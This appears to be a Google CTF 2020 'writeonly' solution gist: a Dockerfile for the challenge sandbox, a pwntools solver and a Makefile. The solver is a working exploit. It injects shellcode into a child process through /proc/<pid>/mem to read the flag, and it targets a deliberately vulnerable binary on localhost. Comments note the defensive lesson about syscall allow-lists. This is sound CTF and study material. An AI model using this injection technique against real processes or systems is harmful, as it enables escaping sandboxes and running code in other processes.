Alt attempt on Google CTF 2020 writeonly
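# Sandbox for the Google CTF 2020 "writeonly" challenge: the challenge binary
# is served on port 1337 via socat and runs as the unprivileged `user` (uid 1337).
FROM ubuntu:20.04

# Install socat in a single layer and remove the apt lists in the same layer so
# they do not persist in the image. `apt-get upgrade` is kept as the author had
# it (it is what the solver in this gist was written against); for a
# reproducible build, bump the base-image tag/digest instead.
RUN apt-get update \
    && apt-get upgrade -y \
    && apt-get install -y --no-install-recommends socat \
    && rm -rf /var/lib/apt/lists/*

# Fixed uid/gid so the runtime can verify the service is not running as root.
RUN set -e -x; \
    groupadd -g 1337 user; \
    useradd -g 1337 -u 1337 -m user

COPY attachments/chal /home/user/
COPY flag /home/user/

# Everything under /home/user is root-owned and not writable by `user`: the
# binary is executable, the directory is read-only, and the flag is readable
# (the challenge relies on the child process being able to read it).
RUN set -e -x; \
    chown -R root:root /home/user; \
    chmod 555 /home/user; \
    chmod 555 /home/user/chal; \
    chmod 444 /home/user/flag

USER user
WORKDIR /home/user

# Exec form so socat is PID 1 and receives SIGTERM from `docker stop`;
# WORKDIR replaces the `cd /home/user` of the original shell-form CMD.
CMD ["socat", "TCP-LISTEN:1337,reuseaddr,fork", "EXEC:./chal"]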
"""Solver for the writeonly sandbox built by the accompanying Dockerfile.

Needs pwntools (third-party: `pwn` / `pwnlib`) and the challenge binary at
src/chal. The Makefile's `doit` target runs it against the container that
`make start` publishes on 127.0.0.1:1337.
"""
from pwn import remote
import pwnlib
import os
# automatically set the binary type
pwnlib.context.context.binary = 'src/chal'
# connect to the site and get child pid
# (the service prints the child's pid on a "[DEBUG] child pid: " line)
r = remote('127.0.0.1', 1337)
r.recvuntil('[DEBUG] child pid: ')
child_pid = int(r.recvline())
# this is the code to be injected into child. since the child can read files, cat the flag
# (copies /home/user/flag to fd 1, then deliberately crashes the child)
injection = pwnlib.asm.asm(pwnlib.shellcraft.cat('/home/user/flag', 1) + pwnlib.shellcraft.crash())
# assemble the code to be executed by parent.
# open child's memory for writing
# NOTE(review): the defensive takeaway — the parent only needs open/lseek/write
# to overwrite the child's code through procfs, so a syscall allow-list that
# permits those still permits cross-process injection. The open succeeds only
# because the parent passes the kernel's ptrace access check for the child;
# a different uid for the child or a non-dumpable child would block it.
payload = pwnlib.shellcraft.open("/proc/{}/mem".format(child_pid), os.O_WRONLY)
# get the file descriptor and seek.
# looking at the disassembled check_flag function, the infinite loop starts at <check_flag+0x8>
# (rax holds the fd returned by open; r12 keeps it across the following syscalls;
# the offset is taken from the binary's symbol table, see `make disass`)
payload += pwnlib.shellcraft.mov('r12', 'rax')
payload += pwnlib.shellcraft.syscall('SYS_lseek', 'r12', pwnlib.context.context.binary.symbols['check_flag'] + 0x8, os.SEEK_SET)
# parent write to child's memory and inject our code
# (the injected bytes are pushed onto the stack and written from rsp)
payload += pwnlib.shellcraft.pushstr(injection)
payload += pwnlib.shellcraft.write("r12", "rsp", len(injection))
# the parent spins afterwards so it does not exit before the child prints
payload = pwnlib.asm.asm(payload + pwnlib.shellcraft.infloop())
r.sendlineafter('shellcode length? ', str(len(payload)))
r.sendafter('bytes of shellcode. ', payload)
# print the output from child
# (recvline raises EOFError once the service closes the connection; that is
# how this loop ends)
while True:
    print(r.recvline())
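# Helper targets for the writeonly sandbox. None of these targets produce a
# file of the same name, so they are declared phony; otherwise a stray file
# called e.g. `build` would make that target a silent no-op.
.PHONY: doit build start stop disass

# Run the solver against the container started by `make start`.
doit:
	python doit.py

# Build the sandbox image from the Dockerfile in this directory.
build:
	docker build -t sandbox-writeonly .

# Publish the challenge port on loopback only so the sandbox is not reachable
# from other hosts.
start:
	docker run --rm --name sandbox-writeonly -p 127.0.0.1:1337:1337 sandbox-writeonly

stop:
	docker stop sandbox-writeonly

# Disassemble only check_flag, the function the solver patches.
disass:
	objdump --disassemble=check_flag src/chal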